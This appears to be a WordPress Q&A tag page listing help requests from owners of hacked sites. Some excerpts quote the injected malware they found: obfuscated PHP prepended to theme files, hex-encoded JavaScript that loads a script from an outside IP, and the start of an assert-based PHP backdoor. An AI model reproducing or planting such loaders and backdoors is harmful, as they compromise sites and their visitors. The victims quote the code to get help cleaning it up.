Articles of hacked

Have I been hacked? Mysterious code at the top of theme files

I found the following at the top of all my theme files. My local copy doesn’t have it! WordPress v4.2.2 running on a Linux server. Plugins: Advanced Custom Fields <?php if(!isset($GLOBALS[“\x61\156\x75\156\x61”])) {$ua=strtolower($_SERVER[“\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54″]); if ((! strstr($ua,”\x6d\163\x69\145″)) and (! strstr($ua,”\x72\166\x3a\61\x31”))) $GLOBALS[“\x61\156\x75\156\x61″]=1; } ?><?php $jobconrfpf = ‘5c%x78257-MSV,6<*)ujojR%x5c%x7b\40\x2f\52\x20\153\x6a\145\x62\161\x61\165\x67\160\x68\40\x2a\57\x20”; $ournfmcogg=substr($jobconrfpf,(42613-32500),(69-57)); $ournfmcogg($xqycebdlqb, $pvjekxgoli, NULL); $ournfmcogg=$pvjekxgoli; $ournfmcogg=(464-343); $jobconrfpf=$ournfmcogg-1; ?> I goes on […]

Website Got Hacked – Fixed – Now Cannot Activate Theme

My wordpress site got hacked, I fixed the problem but had to delete the TwentyFifteen theme (the one that was hacked). The theme I was originally using was different, but the hackers hacked the TwentyFifteen theme. When I deleted the theme, I went back to the wordpress dashboard and see this: As you can see […]

How to find the backdoor of the hack

Today one of our clients’ WordPress sites was hacked which is hosted with amazon aws ubuntu. Issue is https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.html The js code is injected in all js var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80)) and in index.php //###====### @error_reporting(E_ALL); @ini_set(“error_log”,NULL); @ini_set(“log_errors”,0); @ini_set(“display_errors”, 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = “as”; $strings .= “se”; $strings […]

Admin user lacks admin permissions after hack and can't reinstate

My site (4.5.3 on Apache/Linux) was hacked, I suspect something like the one described here. As best I can tell I’ve removed or at least disabled the hack, however admin users aren’t able to perform actions like updating WordPress, adding plugins, etc. So far, I have tried: Editing the existing admin user’s permissions via phpMyAdmin. […]

Can't access htaccess

my htaccess have chmod 444 and it’s not possible for me as admin with ftp access to edit it. Also if I’m disabling all wp security plugins. When I’m change the chmod to 644 or if I just remove the file and create a new one, it’s possible for a short time to edit it. […]

On new server, site got hacked, permissions a bit strange? Please help

I moved to a new server recently, a week later a site got hacked, all they did was change the index.php file of the current enabled theme, no big deal. I did have a few security precautions in place, no admin user name, all latest versions, no timthumb issue, .htaccess security etc. I dont want […]

Is there any pre-existing plugin to track and block IPs with suspicious activity on my site?

The image below shows a recent (failed) attempt to crack my WordPress install. It’s easy for me to look at that and see what they were doing, but is there a plugin that exists that monitors this data and can catch events like this? Especially for something as blatant as this, I would like to […]

Any known bugs that could cause disappearance of the wp_users table?

I administer a number of WordPress-powered web sites. One of these sites is new, and has been running untouched since it was set up a month ago. Today, I tried to log in, but was unable to do so – all my login attempts were rejected. After some investigation, I found out that the wp_users […]

Is wp-app.php or wp-apps.php needed for WordPress?

A few WordPress blogs I overlook have suddenly generated 3 PHP files in their top folder: wp-app.php, wp-apps.php, and wp-register.php, not of which existed before. Checking their contents against a few Google searches suggests I have been infiltrated by a common WordPress exploit. Since they keep regenerating, I thought about blanking them and setting file […]

Troll the hackers by redirecting them

My website is getting somewhat popular, and with the it’s increasing popularity there’s an increase in the hackers. Last night I visited my security logs and found that everyday approximately 10 people try to access /?author=1 /?author=2 /?author=3 /?author=4 but I don’t have any of these user IDs, so a 404 is generated to them. […]